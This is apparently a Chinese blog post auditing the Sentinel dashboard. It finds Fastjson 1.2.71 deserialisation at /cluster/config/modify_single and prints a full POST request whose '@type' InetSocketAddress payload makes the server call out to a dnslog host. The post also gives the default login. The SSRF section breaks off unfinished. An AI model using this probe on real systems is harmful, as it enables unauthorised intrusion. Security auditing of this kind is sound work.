代码审计 | Sentinel CMS 漏洞分析

2025-01-20 2 0

一、cms简介:

本文是关于Sentinel CMS漏洞分析学习,大纲:

1、环境搭建
2、Fastjson漏洞分析
3、SSRF漏洞分析

二、环境搭建

下载源码,使用idea导入

启动环境

默认密码是sentinel/sentinel

三、Fastjson漏洞分析

在查看 pom.xml 时,发现目标系统使用了 Fastjson 1.2.71 版本,该版本是存在历史漏洞的。

全局搜索关键字 parseObject ,找到了一处 Controller 使用的情况

进入 ClusterConfigController ,这是一个用于管理Sentinel集群配置的控制器。查看代码发现,接受了 payload 参数直接进行了 JSON.parseObject(payload)操作。

通过上述代码得到接口为 /cluster/config/modify_single ,POST 请求方式,传入参数为 payload。

POST /cluster/config/modify_single HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:8080/
Cookie: _jspxcms=eab79fcb94a54dbb9b2e4a45f27b5d7b; sentinel_dashboard_cookie=4C92FE586248ACC2A606B96B7A77DE03
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

{"@type":"java.net.InetSocketAddress"{"address":,"val":"xx.dnslog.cn
"}}

验证成功

四、SSRF漏洞分析

首先,漏洞触发点在 MetricFetcher 类中,位于 sentineldashboard\src\main\java\com\alibaba\csp\sentinel\dashboard\metric\MetricFetcher.java

我们分析一下


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

后渗透——Window下多种密码提取的小技巧
一次不成功的菠菜渗透和一些琐事
Outlaw挖矿僵尸网络近期活动分析
应急响应沟通准备与技术梳理(Windows篇)
API安全 | GraphQL API漏洞一览
BUUCTF | reverse wp(一)

发布评论